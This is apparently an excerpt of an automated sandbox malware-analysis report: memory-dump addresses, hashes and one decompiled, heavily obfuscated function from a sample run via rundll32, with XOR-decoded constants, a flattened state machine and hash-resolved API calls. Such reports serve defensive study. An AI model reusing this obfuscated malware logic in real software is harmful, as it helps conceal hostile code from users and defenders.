                                                                                                                                                            0x00376126
                                                                                                                                                            0x0037612e
                                                                                                                                                            0x00376136
                                                                                                                                                            0x0037613b
                                                                                                                                                            0x00376148
                                                                                                                                                            0x0037614b
                                                                                                                                                            0x0037614f
                                                                                                                                                            0x00376157
                                                                                                                                                            0x00376167
                                                                                                                                                            0x0037616b
                                                                                                                                                            0x00376173
                                                                                                                                                            0x0037617b
                                                                                                                                                            0x00376183
                                                                                                                                                            0x00376188
                                                                                                                                                            0x00376190
                                                                                                                                                            0x00376194
                                                                                                                                                            0x0037619c
                                                                                                                                                            0x003761a9
                                                                                                                                                            0x003761aa
                                                                                                                                                            0x003761ae
                                                                                                                                                            0x003761b6
                                                                                                                                                            0x003761be
                                                                                                                                                            0x003761c6
                                                                                                                                                            0x003761ce
                                                                                                                                                            0x003761dc
                                                                                                                                                            0x003761e8
                                                                                                                                                            0x003761f0
                                                                                                                                                            0x003761fa
                                                                                                                                                            0x003761ff
                                                                                                                                                            0x00376207
                                                                                                                                                            0x0037620f
                                                                                                                                                            0x00376214
                                                                                                                                                            0x0037621c
                                                                                                                                                            0x00376224
                                                                                                                                                            0x00376232
                                                                                                                                                            0x00376237
                                                                                                                                                            0x0037623d
                                                                                                                                                            0x00376246
                                                                                                                                                            0x0037624b
                                                                                                                                                            0x00376251
                                                                                                                                                            0x00376259
                                                                                                                                                            0x00376261
                                                                                                                                                            0x00376265
                                                                                                                                                            0x0037626a
                                                                                                                                                            0x00376272
                                                                                                                                                            0x00376284
                                                                                                                                                            0x00376289
                                                                                                                                                            0x00376292
                                                                                                                                                            0x0037629d
                                                                                                                                                            0x003762a5
                                                                                                                                                            0x003762a9
                                                                                                                                                            0x003762ae
                                                                                                                                                            0x003762b6
                                                                                                                                                            0x003762be
                                                                                                                                                            0x003762c6
                                                                                                                                                            0x003762ce
                                                                                                                                                            0x003762d6
                                                                                                                                                            0x003762de
                                                                                                                                                            0x003762f0
                                                                                                                                                            0x003762f8
                                                                                                                                                            0x003762ff
                                                                                                                                                            0x0037630a
                                                                                                                                                            0x00376312
                                                                                                                                                            0x0037631a
                                                                                                                                                            0x0037631f
                                                                                                                                                            0x00376327
                                                                                                                                                            0x00376335
                                                                                                                                                            0x00376418
                                                                                                                                                            0x0037647f
                                                                                                                                                            0x00376484
                                                                                                                                                            0x0037648b
                                                                                                                                                            0x003764c8
                                                                                                                                                            0x003764ca
                                                                                                                                                            0x003764d2
                                                                                                                                                            0x0037648d
                                                                                                                                                            0x0037648d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037648d
                                                                                                                                                            0x0037633b
                                                                                                                                                            0x00376341
                                                                                                                                                            0x0037640e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376347
                                                                                                                                                            0x0037634d
                                                                                                                                                            0x003763ec
                                                                                                                                                            0x003763ed
                                                                                                                                                            0x003763ee
                                                                                                                                                            0x003763f3
                                                                                                                                                            0x003763fe
                                                                                                                                                            0x00376404
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00376404
                                                                                                                                                            0x00376353
                                                                                                                                                            0x00376359
                                                                                                                                                            0x003764b1
                                                                                                                                                            0x003764b7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003764bd
                                                                                                                                                            0x0037635f
                                                                                                                                                            0x0037635f
                                                                                                                                                            0x003763bd
                                                                                                                                                            0x003763c2
                                                                                                                                                            0x003763c9
                                                                                                                                                            0x003763cf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003763cf
                                                                                                                                                            0x003763c9
                                                                                                                                                            0x00376359
                                                                                                                                                            0x0037634d
                                                                                                                                                            0x00376341
                                                                                                                                                            0x003764e1
                                                                                                                                                            0x003764e1
                                                                                                                                                            0x003764a6
                                                                                                                                                            0x003764ac
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: U$3n$3$TNz7$`%8$`%8$fxZn$~&t$6B
                                                                                                                                                            • API String ID: 0-1604698900
                                                                                                                                                            • Opcode ID: 307d802ec84d6377ed8e5cb7896349edadc2bf53520bc888bac9ad75b82f6fc7
                                                                                                                                                            • Instruction ID: ff9322c29765f671c6546cb2399286b27fbab066b69ed8d9010a71f5019a5a02
                                                                                                                                                            • Opcode Fuzzy Hash: 307d802ec84d6377ed8e5cb7896349edadc2bf53520bc888bac9ad75b82f6fc7
                                                                                                                                                            • Instruction Fuzzy Hash: 40F10F714087409FD369CF66D58AA4BFBF1FB84B48F10891DF29A86260D7B68849CF03
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038F435 Relevance: 10.5, Strings: 8, Instructions: 536COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                            			E0038F435(intOrPtr* __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				void* _t551;
				void* _t554;
				signed int _t560;
				void* _t563;
				int _t566;
				void* _t580;
				signed int* _t582;
				void* _t587;
				signed int _t595;
				void* _t598;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				intOrPtr* _t610;
				signed int _t634;
				void* _t659;
				signed int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				void* _t682;
				void* _t683;
				void* _t686;
				void* _t687;
				signed int _t692;
				signed int _t693;
				signed int* _t694;
				void* _t698;

				_t694 =  &_v520;
				_v296 = __edx;
				_v456 = __ecx;
				_v308 = 0x7c82e0;
				_v308 = _v308 ^ 0x9529f8b7;
				_v308 = _v308 ^ 0x95557a57;
				_v444 = 0xbd655a;
				_v444 = _v444 + 0x6586;
				_v444 = _v444 + 0xffff1486;
				_v444 = _v444 ^ 0x00b10b5d;
				_v360 = 0x6df28f;
				_v360 = _v360 >> 0xc;
				_v360 = _v360 ^ 0xc93a0f00;
				_v360 = _v360 ^ 0xc93b57a7;
				_v380 = 0x803da4;
				_v380 = _v380 + 0x81b0;
				_v380 = _v380 << 0x10;
				_v380 = _v380 ^ 0xbf59b73f;
				_v484 = 0xdeaf13;
				_v484 = _v484 | 0x05ba16e8;
				_v484 = _v484 + 0xffff5e7b;
				_v484 = _v484 + 0x21a5;
				_v484 = _v484 ^ 0x05f35408;
				_v516 = 0x9c12e3;
				_v516 = _v516 >> 5;
				_v516 = _v516 + 0x3879;
				_t686 = 0x618a3a9;
				_t676 = 0x46;
				_v516 = _v516 / _t676;
				_v516 = _v516 ^ 0x000beb5e;
				_v404 = 0x49e9fe;
				_v404 = _v404 + 0x1375;
				_v404 = _v404 | 0x014362a3;
				_v404 = _v404 ^ 0x01430578;
				_v408 = 0xd49d0c;
				_v408 = _v408 + 0x89ee;
				_v408 = _v408 | 0xbbfa4d8a;
				_v408 = _v408 ^ 0xbbf95772;
				_v504 = 0x33cefe;
				_v504 = _v504 >> 0xa;
				_v504 = _v504 >> 0xd;
				_v504 = _v504 + 0xffff4738;
				_v504 = _v504 ^ 0xfff61340;
				_v388 = 0x38423a;
				_t601 = 0x7b;
				_v388 = _v388 * 0x2c;
				_v388 = _v388 + 0x7a90;
				_v388 = _v388 ^ 0x09a92ca6;
				_v396 = 0x89c34a;
				_v396 = _v396 >> 6;
				_v396 = _v396 | 0xaa955d3e;
				_v396 = _v396 ^ 0xaa9cf099;
				_v316 = 0x54e1fb;
				_v316 = _v316 + 0xffff88b2;
				_v316 = _v316 ^ 0x0053b1cb;
				_v392 = 0xd67855;
				_v392 = _v392 + 0xd739;
				_v392 = _v392 * 0x34;
				_v392 = _v392 ^ 0x2bb8cf2c;
				_v512 = 0x9dc1ac;
				_v512 = _v512 | 0xff1b5e8c;
				_v512 = _v512 / _t601;
				_v512 = _v512 + 0xc237;
				_v512 = _v512 ^ 0x02115509;
				_v368 = 0xb0c27;
				_v368 = _v368 * 0x3a;
				_v368 = _v368 + 0x9417;
				_v368 = _v368 ^ 0x028ae81d;
				_v352 = 0x7ea940;
				_v352 = _v352 + 0xffff6a40;
				_v352 = _v352 | 0x1d7a7563;
				_v352 = _v352 ^ 0x1d74a207;
				_v340 = 0xd37cb9;
				_v340 = _v340 >> 5;
				_v340 = _v340 ^ 0x00021b7e;
				_v384 = 0xc54f7c;
				_v384 = _v384 | 0xe1c129a4;
				_v384 = _v384 << 6;
				_v384 = _v384 ^ 0x7152788e;
				_v320 = 0xafdf9b;
				_v320 = _v320 | 0x588bef45;
				_v320 = _v320 ^ 0x58ad1127;
				_v508 = 0x7882a6;
				_v508 = _v508 ^ 0x5ae648f7;
				_t677 = 0x7e;
				_v508 = _v508 / _t677;
				_v508 = _v508 + 0xffff266f;
				_v508 = _v508 ^ 0x00b4570c;
				_v344 = 0x25ec7c;
				_t158 =  &_v344; // 0x25ec7c
				_t692 = 0x77;
				_v344 =  *_t158 * 0x48;
				_v344 = _v344 ^ 0x0aab681c;
				_v332 = 0xac456;
				_v332 = _v332 ^ 0x143b2d92;
				_v332 = _v332 ^ 0x1438ce6d;
				_v436 = 0x1dd68;
				_v436 = _v436 + 0x1e14;
				_v436 = _v436 / _t692;
				_v436 = _v436 ^ 0x000407e3;
				_v468 = 0x975814;
				_v468 = _v468 | 0x165c3dad;
				_v468 = _v468 >> 3;
				_v468 = _v468 + 0x9a99;
				_v468 = _v468 ^ 0x02d4af38;
				_v428 = 0xd1fa32;
				_v428 = _v428 + 0x34cd;
				_v428 = _v428 >> 0xa;
				_v428 = _v428 ^ 0x000c7c43;
				_v372 = 0xb93604;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 + 0x569f;
				_v372 = _v372 ^ 0x0001c97c;
				_v312 = 0xb8b780;
				_v312 = _v312 / _t601;
				_v312 = _v312 ^ 0x0009bb57;
				_v364 = 0xc6b8c5;
				_v364 = _v364 >> 4;
				_v364 = _v364 << 0xf;
				_v364 = _v364 ^ 0x35c8234d;
				_v500 = 0x5d2db3;
				_v500 = _v500 | 0xa4ec7bca;
				_v500 = _v500 * 0x42;
				_v500 = _v500 + 0xffff6871;
				_v500 = _v500 ^ 0x8955fb09;
				_v492 = 0xf8ac1c;
				_v492 = _v492 + 0xd489;
				_v492 = _v492 | 0x938b5662;
				_v492 = _v492 << 6;
				_v492 = _v492 ^ 0xfef6fac0;
				_v356 = 0x80a8a7;
				_v356 = _v356 >> 3;
				_v356 = _v356 + 0xffff1aa9;
				_v356 = _v356 ^ 0x00023cc5;
				_v420 = 0x29f504;
				_v420 = _v420 ^ 0x96d25191;
				_v420 = _v420 << 0xa;
				_v420 = _v420 ^ 0xee96722c;
				_v476 = 0x6526e6;
				_t250 =  &_v476; // 0x6526e6
				_t602 = 9;
				_t678 = 0x5e;
				_v476 =  *_t250 * 0x65;
				_t252 =  &_v476; // 0x6526e6
				_v476 =  *_t252 * 0x5d;
				_v476 = _v476 + 0xffffa50d;
				_v476 = _v476 ^ 0x7f6d4504;
				_v304 = 0x6f90;
				_v304 = _v304 + 0xffffb625;
				_v304 = _v304 ^ 0x0000ce69;
				_v348 = 0xd48165;
				_v348 = _v348 * 0x4f;
				_v348 = _v348 + 0xa298;
				_v348 = _v348 ^ 0x41980148;
				_v412 = 0x7e685b;
				_t271 =  &_v412; // 0x7e685b
				_v412 =  *_t271 * 0x1d;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 ^ 0x000f1110;
				_v460 = 0xd80dae;
				_v460 = _v460 * 0x4a;
				_v460 = _v460 << 9;
				_v460 = _v460 >> 5;
				_v460 = _v460 ^ 0x073a202e;
				_v324 = 0x2acd4f;
				_v324 = _v324 ^ 0x1744d618;
				_v324 = _v324 ^ 0x1766082c;
				_v400 = 0xe6723b;
				_v400 = _v400 ^ 0x220d80d9;
				_v400 = _v400 ^ 0x0161a8c1;
				_v400 = _v400 ^ 0x238d1a3c;
				_v376 = 0xaaa6;
				_v376 = _v376 + 0xd31a;
				_v376 = _v376 + 0xfffff53b;
				_v376 = _v376 ^ 0x00079406;
				_v452 = 0xe6cc76;
				_v452 = _v452 ^ 0xa4c29e28;
				_v452 = _v452 / _t602;
				_v452 = _v452 ^ 0x123fe3c8;
				_v520 = 0x822cac;
				_v520 = _v520 / _t678;
				_v520 = _v520 << 4;
				_v520 = _v520 << 9;
				_v520 = _v520 ^ 0x2c5f9d39;
				_v440 = 0xafb195;
				_v440 = _v440 + 0xffff123a;
				_v440 = _v440 >> 0xa;
				_v440 = _v440 ^ 0x0003dc41;
				_v448 = 0xdf86e4;
				_v448 = _v448 ^ 0xac60bb5d;
				_v448 = _v448 ^ 0x5238faed;
				_v448 = _v448 ^ 0xfe8be764;
				_v336 = 0x3e14c9;
				_v336 = _v336 << 7;
				_v336 = _v336 ^ 0x1f0fc953;
				_v496 = 0x4885f3;
				_v496 = _v496 * 0x25;
				_v496 = _v496 + 0x3aa8;
				_v496 = _v496 + 0xffff73aa;
				_v496 = _v496 ^ 0x0a7b30ee;
				_v480 = 0xca6b34;
				_v480 = _v480 >> 9;
				_v480 = _v480 + 0xfb6a;
				_v480 = _v480 / _t692;
				_v480 = _v480 ^ 0x000164ed;
				_v432 = 0xb19133;
				_t679 = 0x63;
				_t693 = _v296;
				_v432 = _v432 * 0x53;
				_v432 = _v432 >> 0x10;
				_v432 = _v432 ^ 0x00018cb4;
				_v328 = 0xdb466c;
				_t603 = _v296;
				_v328 = _v328 / _t679;
				_v328 = _v328 ^ 0x000e2190;
				_v488 = 0xd48740;
				_t680 = 0x44;
				_v488 = _v488 * 7;
				_v488 = _v488 * 0x66;
				_v488 = _v488 + 0x34f;
				_v488 = _v488 ^ 0x50c19e73;
				_v424 = 0xacfab2;
				_v424 = _v424 / _t680;
				_v424 = _v424 | 0xedf008b5;
				_v424 = _v424 ^ 0xedf22909;
				_v472 = 0x2e74a8;
				_v472 = _v472 * 0x3f;
				_v472 = _v472 ^ 0x6424471f;
				_v472 = _v472 >> 0xb;
				_v472 = _v472 ^ 0x0009d0c0;
				_v416 = 0x7e19d4;
				_v416 = _v416 << 0xd;
				_v416 = _v416 + 0x1081;
				_v416 = _v416 ^ 0xc3344569;
				_v464 = 0xa74bb7;
				_v464 = _v464 >> 0xb;
				_v464 = _v464 + 0x9c4;
				_v464 = _v464 >> 6;
				_v464 = _v464 ^ 0x000976a8;
				while(1) {
					L1:
					_t551 = 0xf168e34;
					do {
						while(1) {
							L2:
							_t698 = _t686 - 0x7498ebf;
							if(_t698 > 0) {
								break;
							}
							if(_t698 == 0) {
								_push(_v496);
								_push(_v336);
								_push(_v448);
								_t580 = E00377F1D(_v480, _t603, _v432, E00388606(_v440, 0x371560, __eflags), _v328, _v292 - _t603, _v488);
								E0037A8B0(_v424, _t577, _v472);
								_t582 = _v296;
								 *_t582 = _t693;
								_t582[1] = _t603 + _t580 - _t693;
								goto L29;
							}
							if(_t686 == 0x488924) {
								_t682 = _t682 +  *((intOrPtr*)(_t610 + 4));
								_push(_t610);
								_push(_t610);
								_t693 = E00377FF2(_t682);
								__eflags = _t693;
								_t551 = 0xf168e34;
								_t610 = _v456;
								_t686 =  !=  ? 0xf168e34 : 0xe639f63;
								continue;
							}
							if(_t686 == 0x123a276) {
								_push(_v468);
								_push(_v436);
								_t587 = E0038DCF7(_v332, 0x3715c0, __eflags);
								_push( &_v256);
								_push(_t587);
								_push(_t682);
								_push(_v300);
								 *((intOrPtr*)(E0037A42D(0xab2a8d8a, 0x2b7)))();
								E0037A8B0(_v428, _t587, _v372);
								_t694 =  &(_t694[5]);
								_t686 = 0x488924;
								L12:
								_t610 = _v456;
								while(1) {
									L1:
									_t551 = 0xf168e34;
									goto L2;
								}
							}
							if(_t686 != 0x57ff6e7) {
								if(_t686 == 0x5f676f3) {
									_t598 = E00380AE0(8, 1);
									_push(_v516);
									_t682 = _t598;
									_push( &_v288);
									_push(_t682);
									_push(9);
									E003780E3(_v380, _v484);
									_t686 = 0x7f96e60;
									L11:
									_t694 =  &(_t694[6]);
									goto L12;
								} else {
									if(_t686 != 0x618a3a9) {
										goto L28;
									} else {
										_t686 = 0x5f676f3;
										continue;
									}
								}
								L30:
								return _t595;
							}
							_t682 = 0x4000;
							_push(_t610);
							_push(_t610);
							_t595 = E00377FF2(0x4000);
							_v300 = _t595;
							__eflags = _t595;
							if(__eflags != 0) {
								_t686 = 0x123a276;
								goto L12;
							}
							goto L30;
						}
						__eflags = _t686 - 0x7f96e60;
						if(_t686 == 0x7f96e60) {
							_t554 = E00380AE0(0x10, 4);
							_push(_v396);
							_t682 = _t554;
							_push( &_v128);
							_push(_t682);
							_push(0xb);
							E003780E3(_v504, _v388);
							_t610 = _v456;
							_t694 =  &(_t694[6]);
							_t686 = 0x8d9b717;
							_t551 = 0xf168e34;
							goto L28;
						} else {
							__eflags = _t686 - 0x8d9b717;
							if(_t686 == 0x8d9b717) {
								_t687 =  &_v256;
								_t659 = E00380AE0(0x10, 8);
								_t560 = _v308;
								__eflags = _t560 - _t659;
								if(_t560 < _t659) {
									_t675 = _t659 - _t560;
									_t683 = _t687;
									_t634 = _t675 >> 1;
									__eflags = _t634;
									_t566 = memset(_t683, 0x2d002d, _t634 << 2);
									asm("adc ecx, ecx");
									_t687 = _t687 + _t675 * 2;
									memset(_t683 + _t634, _t566, 0);
									_t694 =  &(_t694[6]);
								}
								_t563 = E00380AE0(0x10, 8);
								_push(_v384);
								_t682 = _t563;
								_push(_t687);
								_push(_t682);
								_push(0xb);
								E003780E3(_v352, _v340);
								_t686 = 0x57ff6e7;
								goto L11;
							} else {
								__eflags = _t686 - 0xa9d081a;
								if(_t686 == 0xa9d081a) {
									E0037ED7E(_v452, _t603, _v520,  *_t610,  *((intOrPtr*)(_t610 + 4)));
									_t610 = _v456;
									_t694 =  &(_t694[3]);
									_t686 = 0x7498ebf;
									_t603 = _t603 +  *((intOrPtr*)(_t610 + 4));
									goto L1;
								} else {
									__eflags = _t686 - 0xe639f63;
									if(_t686 == 0xe639f63) {
										E00388519(_v416, _v464, _v300);
										return 0;
									}
									__eflags = _t686 - _t551;
									if(__eflags != 0) {
										goto L28;
									} else {
										_push(_v476);
										_push(_v420);
										_v292 = _t682 + _t693;
										_push(_v356);
										_t603 = E0038C0C1( &_v128, __eflags,  &_v288, E00388606(_v492, 0x371610, __eflags),  &_v256, _v348, _v412, _v460, _t693, _t682 + _t693 - _t693, _v324) + _t693;
										E0037A8B0(_v400, _t572, _v376);
										_t694 =  &(_t694[0xd]);
										_t686 = 0xa9d081a;
										goto L12;
									}
								}
							}
						}
						goto L30;
						L28:
						__eflags = _t686 - 0x7bf1275;
					} while (__eflags != 0);
					L29:
					return _v300;
				}
			}






























































































                                                                                                                                                            0x0038f435
                                                                                                                                                            0x0038f43f
                                                                                                                                                            0x0038f446
                                                                                                                                                            0x0038f44a
                                                                                                                                                            0x0038f455
                                                                                                                                                            0x0038f460
                                                                                                                                                            0x0038f46b
                                                                                                                                                            0x0038f473
                                                                                                                                                            0x0038f47b
                                                                                                                                                            0x0038f483
                                                                                                                                                            0x0038f48b
                                                                                                                                                            0x0038f496
                                                                                                                                                            0x0038f49e
                                                                                                                                                            0x0038f4a9
                                                                                                                                                            0x0038f4b4
                                                                                                                                                            0x0038f4bf
                                                                                                                                                            0x0038f4ca
                                                                                                                                                            0x0038f4d2
                                                                                                                                                            0x0038f4dd
                                                                                                                                                            0x0038f4e5
                                                                                                                                                            0x0038f4ed
                                                                                                                                                            0x0038f4f5
                                                                                                                                                            0x0038f4fd
                                                                                                                                                            0x0038f505
                                                                                                                                                            0x0038f50d
                                                                                                                                                            0x0038f512
                                                                                                                                                            0x0038f51e
                                                                                                                                                            0x0038f527
                                                                                                                                                            0x0038f52c
                                                                                                                                                            0x0038f532
                                                                                                                                                            0x0038f53a
                                                                                                                                                            0x0038f545
                                                                                                                                                            0x0038f550
                                                                                                                                                            0x0038f55b
                                                                                                                                                            0x0038f566
                                                                                                                                                            0x0038f571
                                                                                                                                                            0x0038f57c
                                                                                                                                                            0x0038f587
                                                                                                                                                            0x0038f592
                                                                                                                                                            0x0038f59a
                                                                                                                                                            0x0038f59f
                                                                                                                                                            0x0038f5a4
                                                                                                                                                            0x0038f5ac
                                                                                                                                                            0x0038f5b4
                                                                                                                                                            0x0038f5c7
                                                                                                                                                            0x0038f5c8
                                                                                                                                                            0x0038f5cf
                                                                                                                                                            0x0038f5da
                                                                                                                                                            0x0038f5e5
                                                                                                                                                            0x0038f5f0
                                                                                                                                                            0x0038f5f8
                                                                                                                                                            0x0038f603
                                                                                                                                                            0x0038f60e
                                                                                                                                                            0x0038f619
                                                                                                                                                            0x0038f624
                                                                                                                                                            0x0038f62f
                                                                                                                                                            0x0038f63a
                                                                                                                                                            0x0038f64d
                                                                                                                                                            0x0038f654
                                                                                                                                                            0x0038f65f
                                                                                                                                                            0x0038f667
                                                                                                                                                            0x0038f675
                                                                                                                                                            0x0038f679
                                                                                                                                                            0x0038f681
                                                                                                                                                            0x0038f689
                                                                                                                                                            0x0038f69c
                                                                                                                                                            0x0038f6a3
                                                                                                                                                            0x0038f6ae
                                                                                                                                                            0x0038f6bb
                                                                                                                                                            0x0038f6c6
                                                                                                                                                            0x0038f6d1
                                                                                                                                                            0x0038f6dc
                                                                                                                                                            0x0038f6e7
                                                                                                                                                            0x0038f6f2
                                                                                                                                                            0x0038f6fa
                                                                                                                                                            0x0038f705
                                                                                                                                                            0x0038f710
                                                                                                                                                            0x0038f71b
                                                                                                                                                            0x0038f723
                                                                                                                                                            0x0038f72e
                                                                                                                                                            0x0038f739
                                                                                                                                                            0x0038f744
                                                                                                                                                            0x0038f74f
                                                                                                                                                            0x0038f757
                                                                                                                                                            0x0038f765
                                                                                                                                                            0x0038f76a
                                                                                                                                                            0x0038f76e
                                                                                                                                                            0x0038f776
                                                                                                                                                            0x0038f77e
                                                                                                                                                            0x0038f789
                                                                                                                                                            0x0038f793
                                                                                                                                                            0x0038f794
                                                                                                                                                            0x0038f79b
                                                                                                                                                            0x0038f7a6
                                                                                                                                                            0x0038f7b1
                                                                                                                                                            0x0038f7bc
                                                                                                                                                            0x0038f7c7
                                                                                                                                                            0x0038f7cf
                                                                                                                                                            0x0038f7df
                                                                                                                                                            0x0038f7e3
                                                                                                                                                            0x0038f7eb
                                                                                                                                                            0x0038f7f3
                                                                                                                                                            0x0038f7fb
                                                                                                                                                            0x0038f800
                                                                                                                                                            0x0038f808
                                                                                                                                                            0x0038f810
                                                                                                                                                            0x0038f818
                                                                                                                                                            0x0038f820
                                                                                                                                                            0x0038f825
                                                                                                                                                            0x0038f82d
                                                                                                                                                            0x0038f838
                                                                                                                                                            0x0038f840
                                                                                                                                                            0x0038f84b
                                                                                                                                                            0x0038f856
                                                                                                                                                            0x0038f86a
                                                                                                                                                            0x0038f871
                                                                                                                                                            0x0038f87c
                                                                                                                                                            0x0038f887
                                                                                                                                                            0x0038f88f
                                                                                                                                                            0x0038f897
                                                                                                                                                            0x0038f8a2
                                                                                                                                                            0x0038f8aa
                                                                                                                                                            0x0038f8b7
                                                                                                                                                            0x0038f8bb
                                                                                                                                                            0x0038f8c3
                                                                                                                                                            0x0038f8cb
                                                                                                                                                            0x0038f8d3
                                                                                                                                                            0x0038f8db
                                                                                                                                                            0x0038f8e3
                                                                                                                                                            0x0038f8e8
                                                                                                                                                            0x0038f8f0
                                                                                                                                                            0x0038f8fb
                                                                                                                                                            0x0038f903
                                                                                                                                                            0x0038f90e
                                                                                                                                                            0x0038f919
                                                                                                                                                            0x0038f921
                                                                                                                                                            0x0038f929
                                                                                                                                                            0x0038f930
                                                                                                                                                            0x0038f938
                                                                                                                                                            0x0038f940
                                                                                                                                                            0x0038f947
                                                                                                                                                            0x0038f94a
                                                                                                                                                            0x0038f94b
                                                                                                                                                            0x0038f94f
                                                                                                                                                            0x0038f954
                                                                                                                                                            0x0038f958
                                                                                                                                                            0x0038f960
                                                                                                                                                            0x0038f968
                                                                                                                                                            0x0038f973
                                                                                                                                                            0x0038f97e
                                                                                                                                                            0x0038f989
                                                                                                                                                            0x0038f99c
                                                                                                                                                            0x0038f9a3
                                                                                                                                                            0x0038f9ae
                                                                                                                                                            0x0038f9b9
                                                                                                                                                            0x0038f9c1
                                                                                                                                                            0x0038f9c6
                                                                                                                                                            0x0038f9ca
                                                                                                                                                            0x0038f9cf
                                                                                                                                                            0x0038f9d7
                                                                                                                                                            0x0038f9e4
                                                                                                                                                            0x0038f9e8
                                                                                                                                                            0x0038f9ed
                                                                                                                                                            0x0038f9f2
                                                                                                                                                            0x0038f9fa
                                                                                                                                                            0x0038fa05
                                                                                                                                                            0x0038fa10
                                                                                                                                                            0x0038fa1b
                                                                                                                                                            0x0038fa26
                                                                                                                                                            0x0038fa31
                                                                                                                                                            0x0038fa3c
                                                                                                                                                            0x0038fa47
                                                                                                                                                            0x0038fa52
                                                                                                                                                            0x0038fa5d
                                                                                                                                                            0x0038fa68
                                                                                                                                                            0x0038fa73
                                                                                                                                                            0x0038fa7b
                                                                                                                                                            0x0038fa8b
                                                                                                                                                            0x0038fa8f
                                                                                                                                                            0x0038fa97
                                                                                                                                                            0x0038faa7
                                                                                                                                                            0x0038faab
                                                                                                                                                            0x0038fab0
                                                                                                                                                            0x0038fab5
                                                                                                                                                            0x0038fabd
                                                                                                                                                            0x0038fac5
                                                                                                                                                            0x0038facd
                                                                                                                                                            0x0038fad2
                                                                                                                                                            0x0038fada
                                                                                                                                                            0x0038fae2
                                                                                                                                                            0x0038faea
                                                                                                                                                            0x0038faf2
                                                                                                                                                            0x0038fafa
                                                                                                                                                            0x0038fb05
                                                                                                                                                            0x0038fb0d
                                                                                                                                                            0x0038fb18
                                                                                                                                                            0x0038fb25
                                                                                                                                                            0x0038fb29
                                                                                                                                                            0x0038fb31
                                                                                                                                                            0x0038fb39
                                                                                                                                                            0x0038fb41
                                                                                                                                                            0x0038fb49
                                                                                                                                                            0x0038fb4e
                                                                                                                                                            0x0038fb5c
                                                                                                                                                            0x0038fb62
                                                                                                                                                            0x0038fb6a
                                                                                                                                                            0x0038fb79
                                                                                                                                                            0x0038fb7c
                                                                                                                                                            0x0038fb83
                                                                                                                                                            0x0038fb87
                                                                                                                                                            0x0038fb8c
                                                                                                                                                            0x0038fb94
                                                                                                                                                            0x0038fbaa
                                                                                                                                                            0x0038fbb1
                                                                                                                                                            0x0038fbb8
                                                                                                                                                            0x0038fbc3
                                                                                                                                                            0x0038fbd0
                                                                                                                                                            0x0038fbd1
                                                                                                                                                            0x0038fbda
                                                                                                                                                            0x0038fbde
                                                                                                                                                            0x0038fbe6
                                                                                                                                                            0x0038fbee
                                                                                                                                                            0x0038fc03
                                                                                                                                                            0x0038fc07
                                                                                                                                                            0x0038fc0f
                                                                                                                                                            0x0038fc17
                                                                                                                                                            0x0038fc24
                                                                                                                                                            0x0038fc28
                                                                                                                                                            0x0038fc30
                                                                                                                                                            0x0038fc35
                                                                                                                                                            0x0038fc3d
                                                                                                                                                            0x0038fc45
                                                                                                                                                            0x0038fc4a
                                                                                                                                                            0x0038fc52
                                                                                                                                                            0x0038fc5a
                                                                                                                                                            0x0038fc62
                                                                                                                                                            0x0038fc67
                                                                                                                                                            0x0038fc6f
                                                                                                                                                            0x0038fc74
                                                                                                                                                            0x0038fc7c
                                                                                                                                                            0x0038fc7c
                                                                                                                                                            0x0038fc7c
                                                                                                                                                            0x0038fc81
                                                                                                                                                            0x0038fc81
                                                                                                                                                            0x0038fc81
                                                                                                                                                            0x0038fc81
                                                                                                                                                            0x0038fc87
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038fc8d
                                                                                                                                                            0x0038ffc3
                                                                                                                                                            0x0038ffcc
                                                                                                                                                            0x0038ffd3
                                                                                                                                                            0x0039000b
                                                                                                                                                            0x0039001f
                                                                                                                                                            0x00390024
                                                                                                                                                            0x00390030
                                                                                                                                                            0x00390032
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00390032
                                                                                                                                                            0x0038fc99
                                                                                                                                                            0x0038fdb2
                                                                                                                                                            0x0038fdc5
                                                                                                                                                            0x0038fdc6
                                                                                                                                                            0x0038fdcc
